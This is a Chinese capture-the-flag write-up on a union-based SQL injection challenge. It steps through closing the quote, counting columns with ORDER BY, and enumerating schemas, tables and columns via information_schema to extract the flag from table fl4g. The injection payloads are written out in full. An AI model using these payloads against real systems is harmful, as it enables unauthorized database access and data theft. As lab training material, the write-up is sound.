这道题按照正常的SQL注入步骤进行即可,没有绕弯弯的地方
1、打开题目环境,在输入框中输入数字1得到成绩回显,输入2和3也能得到相应的回显
2、测试参数包裹方式,输入1'没有得到回显
输入1'#进行注释,得到回显
3、用order by语句测试有几列,输入1' order by 4#时有回显,order by 5时无回显,说明有四列
4、接下使用联合查询语句测试有几个回显点,注意将前面的参数值置换为空,由图可知有三个回显点
5、查库名
输入-1'union select 1,2,3,group_concat(schema_name)from information_schema.schemata #
6、查表名
输入-1'union select 1,2,3,group_concat(table_name)from information_schema.tables where table_schema='skctf'#得到所有表名,可以看到一个fl4g的表
7、查列名
输入-1' union select 1,2,3,group_concat(column_name)from information_schema.columns where table_name='fl4g'#
8、查字段,查出skctf_flag中的数据
输入-1' union select 1,2,3,group_concat(skctf_flag)from skctf.fl4g# 得到flag